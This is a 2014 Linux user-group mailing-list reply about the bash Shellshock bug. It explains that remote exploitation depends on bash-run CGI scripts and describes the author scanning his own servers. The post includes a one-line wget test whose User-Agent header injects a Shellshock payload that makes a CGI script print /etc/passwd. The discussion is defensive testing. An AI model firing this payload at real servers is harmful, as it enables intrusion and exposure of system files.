[kwlug-disc] Vulnerability in bash

[Khalid Baheyeldin]

On Thu, Sep 25, 2014 at 5:24 PM, Hubert Chathi <hubert at uhoreg.ca> wrote:

> For the bash bug, the only way for it to be remotely exploitable is if you
> are running a server that executes programs using bash in response to
> remote requests.  For example (probably the most common), if your web
> server executes a cgi script using bash.  But if you do not allow cgi
> scripts (e.g. if you are only using PHP, via mod_php), then you should be
> safe.


Correct.

Except that many (including me, and many in the PHP CMS universe) choose
not to run mod_php because of its memory footprint, and opt for FastCGI,
with PHP running as PHP-FPM, and either Apache threaded frontending it or
nginx.

For example, this is from a server we manage (Ubuntu 12.04, and 14.04):

# a2dismod
Your choices are: actions alias auth_basic authn_file authz_default
authz_groupfile authz_host authz_user cgid deflate dir env expires fastcgi
mime reqtimeout rewrite setenvif status

Note the cgid there.

So far, I ran a few scans on unpatched servers, and could not get in,
because there is no cgi script to be exploited.

Here is the example script I tried

#!/bin/sh

wget -U "() { test;};echo \"Content-type: text/plain\"; echo; echo;
/bin/cat /etc/passwd" http://example.com/cgi-bin/test.cgi

-- 
Khalid M. Baheyeldin
2bits.com, Inc.
Fast Reliable Drupal
Drupal optimization, development, customization and consulting.
Simplicity is prerequisite for reliability. --  Edsger W.Dijkstra
Simplicity is the ultimate sophistication. --   Leonardo da Vinci
For every complex problem, there is an answer that is clear, simple, and
wrong." -- H.L. Mencken
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://kwlug.org/pipermail/kwlug-disc_kwlug.org/attachments/20140925/cb5aa407/attachment.htm>